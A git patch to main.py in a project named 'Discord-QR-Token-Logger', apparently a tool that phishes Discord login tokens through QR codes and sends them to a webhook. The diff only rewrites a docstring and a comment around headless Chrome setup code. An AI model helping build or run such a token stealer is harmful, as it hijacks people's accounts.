From 14675901a74bc72fb1af8d6d7514a8fd836f25a6 Mon Sep 17 00:00:00 2001 From: mouadessalim <38190847+mouadessalim@users.noreply.github.com> Date: Sun, 8 Jan 2023 19:56:09 +0100 Subject: [PATCH] Update main.py --- Discord-QR-Token-Logger/main.py | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/Discord-QR-Token-Logger/main.py b/Discord-QR-Token-Logger/main.py index 4c34e3e..dda0f82 100644 --- a/Discord-QR-Token-Logger/main.py +++ b/Discord-QR-Token-Logger/main.py @@ -39,9 +39,7 @@ from logger import log_unknown_exceptions @log_unknown_exceptions(ERROR) def main(webhook_url: str) -> None: - """The main function of the program. - \nProgram by Lemon.-_-.#3714, Luci (9P9), the-cult-of-integral and mte0 - """ + #The main function of the program. Write.Print('\n\n[!] Generating QR code...', Colors.red_to_purple) opts = webdriver.ChromeOptions() opts.add_argument('--headless') @@ -49,7 +47,7 @@ def main(webhook_url: str) -> None: opts.add_experimental_option('excludeSwitches', ['enable-logging']) opts.add_argument('--log-level 3') - # This module conflicts with PyStyle; importing here prevents this issue. + # This module have conflicts with PyStyle; importing here prevents the issue. from webdriver_manager.chrome import ChromeDriverManager os.environ['WDM_LOG_LEVEL'] = '0'